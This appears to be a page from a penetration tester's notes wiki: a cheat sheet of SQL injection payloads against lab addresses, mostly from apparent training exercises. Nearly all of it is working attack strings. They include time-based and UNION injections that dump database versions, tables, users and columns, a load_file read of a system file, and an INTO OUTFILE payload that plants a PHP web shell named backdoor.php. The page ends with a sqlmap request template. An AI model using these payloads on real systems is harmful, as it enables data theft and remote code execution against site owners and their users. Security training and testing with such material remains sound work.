SQL Injection

PreviousDatabases NextWAF Bypass

Last updated 2 years ago

SQL Injection

SQLite

Concat:

Select variable || variable1 as name from table

TimeBased:

http://192.168.140.52/debug.php?id=(SELECT%20LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

UNION:

http://192.168.140.52/debug.php?id=1 UNION select * from users

list version:

http://10.11.0.22/debug.php?id=1 union all select 1, 2, @@version

list tables:

http://10.11.0.22/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

list users:

http://10.11.0.22/debug.php?id=1 union all select 1, 2, user()
http://10.11.0.22/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

code exec:

http://10.11.0.22/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
http://10.11.0.22/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

Useful commands:

LIMIT

UNION

Useful links:

MySQL / MariaDB Enum

Show user permissions:

SHOW GRANTS;

Show tables:

SHOW TABLES;

Variables:

SHOW VARIABLES;

Oracle injection

SQL Map

Put into request - * specifies injection point:

sqlmap -r req.txt

GET http://sandbox.local/ HTTP/1.1
Host: sandbox.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp_sap=["1650149780')) OR 1=2 *#"]
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

PreviousDatabases NextWAF Bypass

Last updated 2 years ago